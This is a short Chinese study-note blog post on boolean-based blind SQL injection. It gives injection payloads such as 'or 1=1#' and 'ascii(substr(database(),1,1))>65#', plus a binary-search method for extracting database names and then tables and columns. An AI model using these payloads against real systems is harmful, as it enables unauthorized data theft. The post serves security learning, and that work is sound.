#学习笔记【SQL注入2】 – 作者:Tambrinem

【渗透案例】布尔注入

  • 我们发现一个有趣的现象:分别构造-1′ or 1=1#和-1′ or 1=2#时,后者的响应时间较短,作者猜测是因为逻辑条件为假时,数据库执行当条语句完事儿时间较快(有待考究)

1618903932_607e837ce19f7d0611cd5.png!small

  • 利用该现象构造布尔注入
  • 二分法  2′ or length(database())>5#
  • 确定数据库名长度=5
  • 二分法 2′ or ascii(substr(database(),1,1))>65#
  • 第一个字符=y
  • 二分法 2′ or ascii(substr(database(),2,1))>65#
  • ……..
  • 结果=*****
  • 以此类推可跑出库-表-列数据
  • <end> 欢迎交流</end>

来源:freebuf.com 2021-04-20 15:55:27 by: Tambrinem

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论